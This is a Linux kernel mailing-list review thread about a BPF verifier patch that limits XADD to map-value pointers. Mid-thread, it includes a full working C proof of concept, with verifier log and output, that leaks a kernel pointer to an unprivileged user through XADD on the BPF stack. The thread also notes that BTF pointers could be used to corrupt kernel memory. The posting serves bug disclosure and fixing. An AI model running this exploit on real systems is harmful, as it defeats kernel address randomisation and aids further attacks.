Message ID:    20200415204743.206086-1-jannh@google.com
State:         Changes Requested
Delegated to:  BPF Maintainers
Series:        [bpf] bpf: Use pointer type whitelist for XADD
> On Apr 15, 2020, at 1:47 PM, Jann Horn <jannh@google.com> wrote:
>
> At the moment, check_xadd() uses a blacklist to decide whether a given
> pointer type should be usable with the XADD instruction. Out of all the
> pointer types that check_mem_access() accepts, only four are currently let
> through by check_xadd():
>
>     PTR_TO_MAP_VALUE
>     PTR_TO_CTX          rejected
>     PTR_TO_STACK
>     PTR_TO_PACKET       rejected
>     PTR_TO_PACKET_META  rejected
>     PTR_TO_FLOW_KEYS    rejected
>     PTR_TO_SOCKET       rejected
>     PTR_TO_SOCK_COMMON  rejected
>     PTR_TO_TCP_SOCK     rejected
>     PTR_TO_XDP_SOCK     rejected
>     PTR_TO_TP_BUFFER
>     PTR_TO_BTF_ID
>
> Looking at the currently permitted ones:
>
> - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD.
> - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on
>   the BPF stack. It also causes confusion further down, because the first
>   check_mem_access() won't check whether the stack slot being read from is
>   STACK_SPILL and the second check_mem_access() assumes in
>   check_stack_write() that the value being written is a normal scalar.
>   This means that unprivileged users can leak kernel pointers.
> - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency.
> - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier
>   tries to verify XADD on such memory, the first check_ptr_to_btf_access()
>   invocation gets confused by value_regno not being a valid array index
>   and writes to out-of-bounds memory.
>
> Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make
> sense, and is sometimes broken on top of that.
>
> Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)")
> Signed-off-by: Jann Horn <jannh@google.com>
> ---
> I'm just sending this on the public list, since the worst-case impact for
> non-root users is leaking kernel pointers to userspace. In a context where
> you can reach BPF (no sandboxing), I don't think that kernel ASLR is very
> effective at the moment anyway.
IIUC, this is to fix leaking kernel pointers? If this is accurate, we should
include this information in the commit log.

> This breaks ten unit tests that assume that XADD is possible on the stack,
> and I'm not sure how all of them should be fixed up; I'd appreciate it if
> someone else could figure out how to fix them. I think some of them might
> be using XADD to cast pointers to numbers, or something like that? But I'm
> not sure.

Could you please list which tests are broken by this? We need to be careful,
because some tools probably depend on this.

Thanks,
Song
On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > At the moment, check_xadd() uses a blacklist to decide whether a given > pointer type should be usable with the XADD instruction. Out of all the > pointer types that check_mem_access() accepts, only four are currently let > through by check_xadd(): > > PTR_TO_MAP_VALUE > PTR_TO_CTX rejected > PTR_TO_STACK > PTR_TO_PACKET rejected > PTR_TO_PACKET_META rejected > PTR_TO_FLOW_KEYS rejected > PTR_TO_SOCKET rejected > PTR_TO_SOCK_COMMON rejected > PTR_TO_TCP_SOCK rejected > PTR_TO_XDP_SOCK rejected > PTR_TO_TP_BUFFER > PTR_TO_BTF_ID > > Looking at the currently permitted ones: > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > the BPF stack. It also causes confusion further down, because the first > check_mem_access() won't check whether the stack slot being read from is > STACK_SPILL and the second check_mem_access() assumes in > check_stack_write() that the value being written is a normal scalar. > This means that unprivileged users can leak kernel pointers. > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > invocation gets confused by value_regno not being a valid array index > and writes to out-of-bounds memory. > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > sense, and is sometimes broken on top of that. > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > Signed-off-by: Jann Horn <jannh@google.com> > --- > I'm just sending this on the public list, since the worst-case impact for > non-root users is leaking kernel pointers to userspace. In a context where > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > effective at the moment anyway. 
>
> This breaks ten unit tests that assume that XADD is possible on the stack,
> and I'm not sure how all of them should be fixed up; I'd appreciate it if
> someone else could figure out how to fix them. I think some of them might
> be using XADD to cast pointers to numbers, or something like that? But I'm
> not sure.
>
> Or is XADD on the stack actually something you want to support for some
> reason, meaning that that part would have to be fixed differently?

Yeah, 'doesn't make sense' is relative. I prefer to fix the issues instead
of disabling them. XADD to PTR_TO_STACK, PTR_TO_TP_BUFFER and PTR_TO_BTF_ID
should all work, because they are direct pointers to objects, unlike
pointers to ctx and flow_keys, which will be rewritten and are not direct
pointers.

Short term I think it's fine to disable PTR_TO_TP_BUFFER, because prog
breakage is unlikely (if it's actually broken, which I'm not sure of yet).
But PTR_TO_BTF_ID and PTR_TO_STACK should be fixed. The former could be
used in bpf-tcp-cc progs; I don't think it is now, but it's certainly
conceivable. PTR_TO_STACK should continue to work because tests are using
it. 'But the stack has no concurrency' is not an excuse to break tests.

Also, I don't understand why you're saying that PTR_TO_STACK XADD is
leaking. The first check_mem_access() will check for STACK_SPILL, AFAICS.
On Thu, Apr 16, 2020 at 11:11 PM Alexei Starovoitov <alexei.starovoitov@gmail.com> wrote: > On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > > At the moment, check_xadd() uses a blacklist to decide whether a given > > pointer type should be usable with the XADD instruction. Out of all the > > pointer types that check_mem_access() accepts, only four are currently let > > through by check_xadd(): > > > > PTR_TO_MAP_VALUE > > PTR_TO_CTX rejected > > PTR_TO_STACK > > PTR_TO_PACKET rejected > > PTR_TO_PACKET_META rejected > > PTR_TO_FLOW_KEYS rejected > > PTR_TO_SOCKET rejected > > PTR_TO_SOCK_COMMON rejected > > PTR_TO_TCP_SOCK rejected > > PTR_TO_XDP_SOCK rejected > > PTR_TO_TP_BUFFER > > PTR_TO_BTF_ID > > > > Looking at the currently permitted ones: > > > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > > the BPF stack. It also causes confusion further down, because the first > > check_mem_access() won't check whether the stack slot being read from is > > STACK_SPILL and the second check_mem_access() assumes in > > check_stack_write() that the value being written is a normal scalar. > > This means that unprivileged users can leak kernel pointers. > > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > > invocation gets confused by value_regno not being a valid array index > > and writes to out-of-bounds memory. > > > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > > sense, and is sometimes broken on top of that. 
> > > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > > Signed-off-by: Jann Horn <jannh@google.com> > > --- > > I'm just sending this on the public list, since the worst-case impact for > > non-root users is leaking kernel pointers to userspace. In a context where > > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > > effective at the moment anyway. > > > > This breaks ten unit tests that assume that XADD is possible on the stack, > > and I'm not sure how all of them should be fixed up; I'd appreciate it if > > someone else could figure out how to fix them. I think some of them might > > be using XADD to cast pointers to numbers, or something like that? But I'm > > not sure. > > > > Or is XADD on the stack actually something you want to support for some > > reason, meaning that that part would have to be fixed differently? > > yeah. 'doesnt make sense' is relative. > I prefer to fix the issues instead of disabling them. > xadd to PTR_TO_STACK, PTR_TO_TP_BUFFER, PTR_TO_BTF_ID should all work > because they are direct pointers to objects. PTR_TO_STACK and PTR_TO_TP_BUFFER I can sort of understand. But PTR_TO_BTF_ID is always readonly, so XADD on PTR_TO_BTF_ID really doesn't make any sense AFAICS. > Unlike pointer to ctx and flow_key that will be rewritten and are not > direct pointers. > > Short term I think it's fine to disable PTR_TO_TP_BUFFER because > prog breakage is unlikely (if it's actually broken which I'm not sure yet). > But PTR_TO_BTF_ID and PTR_TO_STACK should be fixed. > The former could be used in bpf-tcp-cc progs. I don't think it is now, > but it's certainly conceivable. > PTR_TO_STACK should continue to work because tests are using it. > 'but stack has no concurrency' is not an excuse to break tests. Meh, if you insist, I guess I can patch it differently. Although I really think that "tests abuse it as a hack" shouldn't be a reason to keep around functionality that doesn't make sense for production use. 
> Also I don't understand why you're saying that PTR_TO_STACK xadd is leaking.
> The first check_mem_access() will check for STACK_SPILL afaics.

Nope. check_stack_read() checks for STACK_SPILL, but it doesn't do anything
special with that information.

user@vm:~/test/bpf-xadd-pointer-leak$ cat bpf-pointer-leak.c
#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <linux/prctl.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/socket.h>
#include <string.h>
#include <poll.h>
#include <sys/uio.h>
#include <fcntl.h>

#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))

/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10

#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
	((struct bpf_insn) { \
		.code = BPF_LD | BPF_DW | BPF_IMM, \
		.dst_reg = DST, \
		.src_reg = SRC, \
		.off = 0, \
		.imm = (__u32) (IMM) }), \
	((struct bpf_insn) { \
		.code = 0, /* zero is reserved opcode */ \
		.dst_reg = 0, \
		.src_reg = 0, \
		.off = 0, \
		.imm = ((__u64) (IMM)) >> 32 })

#define BPF_LD_MAP_FD(DST, MAP_FD) \
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
	((struct bpf_insn) { \
		.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
		.dst_reg = DST, \
		.src_reg = SRC, \
		.off = OFF, \
		.imm = 0 })

#define BPF_MOV64_REG(DST, SRC) \
	((struct bpf_insn) { \
		.code = BPF_ALU64 | BPF_MOV | BPF_X, \
		.dst_reg = DST, \
		.src_reg = SRC, \
		.off = 0, \
		.imm = 0 })

#define BPF_ALU64_IMM(OP, DST, IMM) \
	((struct bpf_insn) { \
		.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
		.dst_reg = DST, \
		.src_reg = 0, \
		.off = 0, \
		.imm = IMM })

#define BPF_ALU32_IMM(OP, DST, IMM) \
	((struct bpf_insn) { \
		.code = BPF_ALU | BPF_OP(OP) | BPF_K, \
		.dst_reg = DST, \
		.src_reg = 0, \
		.off = 0, \
		.imm = IMM })

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
	((struct bpf_insn) { \
		.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
		.dst_reg = DST, \
		.src_reg = SRC, \
		.off = OFF, \
		.imm = 0 })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
	((struct bpf_insn) { \
		.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
		.dst_reg = DST, \
		.src_reg = 0, \
		.off = OFF, \
		.imm = IMM })

#define BPF_EMIT_CALL(FUNC) \
	((struct bpf_insn) { \
		.code = BPF_JMP | BPF_CALL, \
		.dst_reg = 0, \
		.src_reg = 0, \
		.off = 0, \
		.imm = (FUNC) })

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
	((struct bpf_insn) { \
		.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
		.dst_reg = DST, \
		.src_reg = 0, \
		.off = OFF, \
		.imm = IMM })

#define BPF_EXIT_INSN() \
	((struct bpf_insn) { \
		.code = BPF_JMP | BPF_EXIT, \
		.dst_reg = 0, \
		.src_reg = 0, \
		.off = 0, \
		.imm = 0 })

#define BPF_LD_ABS(SIZE, IMM) \
	((struct bpf_insn) { \
		.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
		.dst_reg = 0, \
		.src_reg = 0, \
		.off = 0, \
		.imm = IMM })

#define BPF_ALU64_REG(OP, DST, SRC) \
	((struct bpf_insn) { \
		.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
		.dst_reg = DST, \
		.src_reg = SRC, \
		.off = 0, \
		.imm = 0 })

#define BPF_MOV64_IMM(DST, IMM) \
	((struct bpf_insn) { \
		.code = BPF_ALU64 | BPF_MOV | BPF_K, \
		.dst_reg = DST, \
		.src_reg = 0, \
		.off = 0, \
		.imm = IMM })

int bpf_(int cmd, union bpf_attr *attrs) {
	return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int array_create(int value_size, int num_entries) {
	union bpf_attr create_map_attrs = {
		.map_type = BPF_MAP_TYPE_ARRAY,
		.key_size = 4,
		.value_size = value_size,
		.max_entries = num_entries
	};
	int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
	if (mapfd == -1)
		err(1, "map create");
	return mapfd;
}

unsigned long get_ulong(int map_fd, uint64_t idx) {
	uint64_t value;
	union bpf_attr lookup_map_attrs = {
		.map_fd = map_fd,
		.key = (uint64_t)&idx,
		.value = (uint64_t)&value
	};
	if (bpf_(BPF_MAP_LOOKUP_ELEM, &lookup_map_attrs))
		err(1, "MAP_LOOKUP_ELEM");
	return value;
}

int
prog_load(struct bpf_insn *insns, size_t insns_count) {
	char verifier_log[100000];
	union bpf_attr create_prog_attrs = {
		.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
		.insn_cnt = insns_count,
		.insns = (uint64_t)insns,
		.license = (uint64_t)GPLv2,
		.log_level = 2,
		.log_size = sizeof(verifier_log),
		.log_buf = (uint64_t)verifier_log
	};
	int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
	int errno_ = errno;
	printf("==========================\n%s==========================\n",
	       verifier_log);
	errno = errno_;
	if (progfd == -1)
		err(1, "prog load");
	return progfd;
}

int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
	int progfd = prog_load(insns, insns_count);

	// hook eBPF program up to a socket
	// sendmsg() to the socket will trigger the filter
	// returning 0 in the filter should toss the packet
	int socks[2];
	if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
		err(1, "socketpair");
	if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd,
		       sizeof(int)))
		err(1, "setsockopt");
	return socks[1];
}

void trigger_proc(int sockfd) {
	if (write(sockfd, "X", 1) != 1)
		err(1, "write to proc socket failed");
}

int main(void) {
	int small_map = array_create(8, 1);
	struct bpf_insn insns[] = {
		// r7 = map_pointer
		BPF_LD_MAP_FD(BPF_REG_7, small_map),

		// r8 = launder(map_pointer)
		BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_7, -8),
		BPF_MOV64_IMM(BPF_REG_1, 0),
		((struct bpf_insn) {
			.code = BPF_STX | BPF_DW | BPF_XADD,
			.dst_reg = BPF_REG_FP,
			.src_reg = BPF_REG_1,
			.off = -8
		}),
		BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_FP, -8),

		// store r8 into map
		BPF_MOV64_REG(BPF_REG_ARG1, BPF_REG_7),
		BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
		BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
		BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
		BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
		BPF_EXIT_INSN(),
		BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0),

		BPF_MOV64_IMM(BPF_REG_0, 0),
		BPF_EXIT_INSN()
	};
	int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
	trigger_proc(sock_fd);
	printf("map[0] = 0x%lx\n", get_ulong(small_map, 0));
}
user@vm:~/test/bpf-xadd-pointer-leak$ gcc -o bpf-pointer-leak bpf-pointer-leak.c
user@vm:~/test/bpf-xadd-pointer-leak$ ./bpf-pointer-leak
==========================
func#0 @0
0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (18) r7 = 0x0
2: R1=ctx(id=0,off=0,imm=0) R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0
2: (7b) *(u64 *)(r10 -8) = r7
3: R1=ctx(id=0,off=0,imm=0) R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0 fp-8_w=map_ptr
3: (b7) r1 = 0
4: R1_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0 fp-8_w=map_ptr
4: (db) lock *(u64 *)(r10 -8) += r1
5: R1_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0 fp-8_w=mmmmmmmm
5: (79) r8 = *(u64 *)(r10 -8)
6: R1_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm
6: (bf) r1 = r7
7: R1_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm
7: (bf) r2 = r10
8: R1_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R2_w=fp0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm
8: (07) r2 += -4
9: R1_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R2_w=fp-4 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm
9: (62) *(u32 *)(r2 +0) = 0
10: R1_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R2_w=fp-4 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm
10: (85) call bpf_map_lookup_elem#1
11: R0_w=map_value_or_null(id=1,off=0,ks=4,vs=8,imm=0) R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm
11: (55) if r0 != 0x0 goto pc+1
 R0_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm
12: R0_w=invP0 R7_w=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8_w=invP(id=0) R10=fp0 fp-8_w=mmmmmmmm
12: (95) exit
13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8=invP(id=0) R10=fp0 fp-8=mmmmmmmm
13: (7b) *(u64 *)(r0 +0) = r8
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8=invP(id=0) R10=fp0 fp-8=mmmmmmmm
14: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8=invP(id=0) R10=fp0 fp-8=mmmmmmmm
14: (b7) r0 = 0
15: R0_w=invP0 R7=map_ptr(id=0,off=0,ks=4,vs=8,imm=0) R8=invP(id=0) R10=fp0 fp-8=mmmmmmmm
15: (95) exit
processed 15 insns (limit 1000000) max_states_per_insn 0 total_states 1 peak_states 1 mark_read 1
==========================
map[0] = 0xffff888067ffa800
user@vm:~/test/bpf-xadd-pointer-leak$
On Fri, Apr 17, 2020 at 12:34:42AM +0200, Jann Horn wrote: > On Thu, Apr 16, 2020 at 11:11 PM Alexei Starovoitov > <alexei.starovoitov@gmail.com> wrote: > > On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > > > At the moment, check_xadd() uses a blacklist to decide whether a given > > > pointer type should be usable with the XADD instruction. Out of all the > > > pointer types that check_mem_access() accepts, only four are currently let > > > through by check_xadd(): > > > > > > PTR_TO_MAP_VALUE > > > PTR_TO_CTX rejected > > > PTR_TO_STACK > > > PTR_TO_PACKET rejected > > > PTR_TO_PACKET_META rejected > > > PTR_TO_FLOW_KEYS rejected > > > PTR_TO_SOCKET rejected > > > PTR_TO_SOCK_COMMON rejected > > > PTR_TO_TCP_SOCK rejected > > > PTR_TO_XDP_SOCK rejected > > > PTR_TO_TP_BUFFER > > > PTR_TO_BTF_ID > > > > > > Looking at the currently permitted ones: > > > > > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > > > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > > > the BPF stack. It also causes confusion further down, because the first > > > check_mem_access() won't check whether the stack slot being read from is > > > STACK_SPILL and the second check_mem_access() assumes in > > > check_stack_write() that the value being written is a normal scalar. > > > This means that unprivileged users can leak kernel pointers. > > > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > > > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > > > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > > > invocation gets confused by value_regno not being a valid array index > > > and writes to out-of-bounds memory. > > > > > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > > > sense, and is sometimes broken on top of that. 
> > > > > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > > > Signed-off-by: Jann Horn <jannh@google.com> > > > --- > > > I'm just sending this on the public list, since the worst-case impact for > > > non-root users is leaking kernel pointers to userspace. In a context where > > > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > > > effective at the moment anyway. > > > > > > This breaks ten unit tests that assume that XADD is possible on the stack, > > > and I'm not sure how all of them should be fixed up; I'd appreciate it if > > > someone else could figure out how to fix them. I think some of them might > > > be using XADD to cast pointers to numbers, or something like that? But I'm > > > not sure. > > > > > > Or is XADD on the stack actually something you want to support for some > > > reason, meaning that that part would have to be fixed differently? > > > > yeah. 'doesnt make sense' is relative. > > I prefer to fix the issues instead of disabling them. > > xadd to PTR_TO_STACK, PTR_TO_TP_BUFFER, PTR_TO_BTF_ID should all work > > because they are direct pointers to objects. > > PTR_TO_STACK and PTR_TO_TP_BUFFER I can sort of understand. But > PTR_TO_BTF_ID is always readonly, so XADD on PTR_TO_BTF_ID really > doesn't make any sense AFAICS. Not quite. See bpf_tcp_ca_btf_struct_access(). Few fields of one specific 'struct tcp_sock' are whitelisted for write. > > > Unlike pointer to ctx and flow_key that will be rewritten and are not > > direct pointers. > > > > Short term I think it's fine to disable PTR_TO_TP_BUFFER because > > prog breakage is unlikely (if it's actually broken which I'm not sure yet). > > But PTR_TO_BTF_ID and PTR_TO_STACK should be fixed. > > The former could be used in bpf-tcp-cc progs. I don't think it is now, > > but it's certainly conceivable. > > PTR_TO_STACK should continue to work because tests are using it. > > 'but stack has no concurrency' is not an excuse to break tests. 
>
> Meh, if you insist, I guess I can patch it differently. Although I
> really think that "tests abuse it as a hack" shouldn't be a reason to
> keep around functionality that doesn't make sense for production use.

The pointer could have reached __sync_fetch_and_add() via two different
paths just to simplify the C code:

	if (..)
		my_value = lookup();
	else
		my_value = &my_init_value;
	__sync_fetch_and_add(&my_value->counter, 1);
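[Editor's note: the two-path pattern described above can be sketched as a plain
userspace C analogue. All names here (struct counter, lookup(), count_hit())
are hypothetical, and the global array merely stands in for a BPF map; the point
is that a single __sync_fetch_and_add() site can see pointers of different
provenance.]

	#include <assert.h>
	#include <stddef.h>

	/* Hypothetical per-flow counter object, standing in for a map value. */
	struct counter { long hits; };

	static struct counter global_counters[4];   /* "map" storage */

	/* Stand-in for bpf_map_lookup_elem(): may fail and return NULL. */
	static struct counter *lookup(unsigned key) {
		return key < 4 ? &global_counters[key] : NULL;
	}

	/* One atomic-add site, but the pointer feeding it can come from
	 * either branch: the map path or the stack-object fallback path. */
	static long count_hit(unsigned key) {
		struct counter fallback = { 0 };    /* stack object */
		struct counter *c = lookup(key);
		if (!c)
			c = &fallback;
		__sync_fetch_and_add(&c->hits, 1);
		return c->hits;
	}

	int main(void) {
		assert(count_hit(1) == 1);          /* map path */
		assert(count_hit(1) == 2);
		assert(count_hit(99) == 1);         /* stack fallback path */
		return 0;
	}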
On Fri, Apr 17, 2020 at 2:41 AM Alexei Starovoitov <alexei.starovoitov@gmail.com> wrote: > On Fri, Apr 17, 2020 at 12:34:42AM +0200, Jann Horn wrote: > > On Thu, Apr 16, 2020 at 11:11 PM Alexei Starovoitov > > <alexei.starovoitov@gmail.com> wrote: > > > On Wed, Apr 15, 2020 at 10:47:43PM +0200, Jann Horn wrote: > > > > At the moment, check_xadd() uses a blacklist to decide whether a given > > > > pointer type should be usable with the XADD instruction. Out of all the > > > > pointer types that check_mem_access() accepts, only four are currently let > > > > through by check_xadd(): > > > > > > > > PTR_TO_MAP_VALUE > > > > PTR_TO_CTX rejected > > > > PTR_TO_STACK > > > > PTR_TO_PACKET rejected > > > > PTR_TO_PACKET_META rejected > > > > PTR_TO_FLOW_KEYS rejected > > > > PTR_TO_SOCKET rejected > > > > PTR_TO_SOCK_COMMON rejected > > > > PTR_TO_TCP_SOCK rejected > > > > PTR_TO_XDP_SOCK rejected > > > > PTR_TO_TP_BUFFER > > > > PTR_TO_BTF_ID > > > > > > > > Looking at the currently permitted ones: > > > > > > > > - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. > > > > - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on > > > > the BPF stack. It also causes confusion further down, because the first > > > > check_mem_access() won't check whether the stack slot being read from is > > > > STACK_SPILL and the second check_mem_access() assumes in > > > > check_stack_write() that the value being written is a normal scalar. > > > > This means that unprivileged users can leak kernel pointers. > > > > - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. > > > > - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier > > > > tries to verify XADD on such memory, the first check_ptr_to_btf_access() > > > > invocation gets confused by value_regno not being a valid array index > > > > and writes to out-of-bounds memory. 
> > > > > > > Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make > > > > sense, and is sometimes broken on top of that. > > > > > > > > Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") > > > > Signed-off-by: Jann Horn <jannh@google.com> > > > > --- > > > > I'm just sending this on the public list, since the worst-case impact for > > > > non-root users is leaking kernel pointers to userspace. In a context where > > > > you can reach BPF (no sandboxing), I don't think that kernel ASLR is very > > > > effective at the moment anyway. > > > > > > > > This breaks ten unit tests that assume that XADD is possible on the stack, > > > > and I'm not sure how all of them should be fixed up; I'd appreciate it if > > > > someone else could figure out how to fix them. I think some of them might > > > > be using XADD to cast pointers to numbers, or something like that? But I'm > > > > not sure. > > > > > > > > Or is XADD on the stack actually something you want to support for some > > > > reason, meaning that that part would have to be fixed differently? > > > > > > yeah. 'doesnt make sense' is relative. > > > I prefer to fix the issues instead of disabling them. > > > xadd to PTR_TO_STACK, PTR_TO_TP_BUFFER, PTR_TO_BTF_ID should all work > > > because they are direct pointers to objects. > > > > PTR_TO_STACK and PTR_TO_TP_BUFFER I can sort of understand. But > > PTR_TO_BTF_ID is always readonly, so XADD on PTR_TO_BTF_ID really > > doesn't make any sense AFAICS. > > Not quite. See bpf_tcp_ca_btf_struct_access(). Few fields of one specific > 'struct tcp_sock' are whitelisted for write. Oh... but that kind of thing is not really safe, right? While there aren't really any pointers to struct tcp_sock in the kernel, I've noticed that there are also some helpers that take ARG_PTR_TO_BTF_ID arguments, which is kind of similar; and those look like it wouldn't be hard for root to abuse them to corrupt kernel memory. E.g. 
bpf_skb_output_proto is reachable from tracing programs, so I expect that it'd be pretty easy to corrupt kernel memory with that. As far as I can tell, fundamentally, BPF must not write through BTF pointers because the BPF verifier can't guarantee that BTF pointers actually point to the type they're supposed to point to. > > > Unlike pointer to ctx and flow_key that will be rewritten and are not > > > direct pointers. > > > > > > Short term I think it's fine to disable PTR_TO_TP_BUFFER because > > > prog breakage is unlikely (if it's actually broken which I'm not sure yet). > > > But PTR_TO_BTF_ID and PTR_TO_STACK should be fixed. > > > The former could be used in bpf-tcp-cc progs. I don't think it is now, > > > but it's certainly conceivable. > > > PTR_TO_STACK should continue to work because tests are using it. > > > 'but stack has no concurrency' is not an excuse to break tests. > > > > Meh, if you insist, I guess I can patch it differently. Although I > > really think that "tests abuse it as a hack" shouldn't be a reason to > > keep around functionality that doesn't make sense for production use. > > The pointer could have reached __sync_fetch_and_add() via two different paths > just to simplify the C code: > if (..) > my_value = lookup(); > else > my_value = &my_init_value; > __sync_fetch_and_add(&my_init_value->counter, 1); Yeah, okay, I guess that could happen.
